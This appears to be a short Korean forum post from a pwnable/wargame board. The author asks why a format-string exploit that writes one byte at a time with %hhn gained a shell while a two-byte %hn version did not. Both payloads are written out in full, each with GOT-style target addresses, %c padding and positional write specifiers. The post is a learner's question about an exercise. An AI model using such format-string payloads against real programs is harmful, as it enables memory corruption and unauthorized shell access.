문제를 어찌 풀긴 풀었는데... 궁금한게 있습니다.
처음에는 "%1$hn" 2바이트 방식으로 접근해서 풀려고하는데 도저히 쉘을 획득할 수 없었기에 (제가 지식이 너무 짧아서...)
"%1$hhn"으로 1바이트로 했더니 되었습니다..이유가 있나요??
첫 번째 %hn 페이로드 : \x12\xa0\x04\x08\x10\xa0\x04\x08%2044c%1$hn%32357c%2$hn
두 번째 %hhn 페이로드 : \x10\xa0\x04\x08\x11\xa0\x04\x08%97c%1$hhn%29c%2$hhn
#pwnable
작성자 정보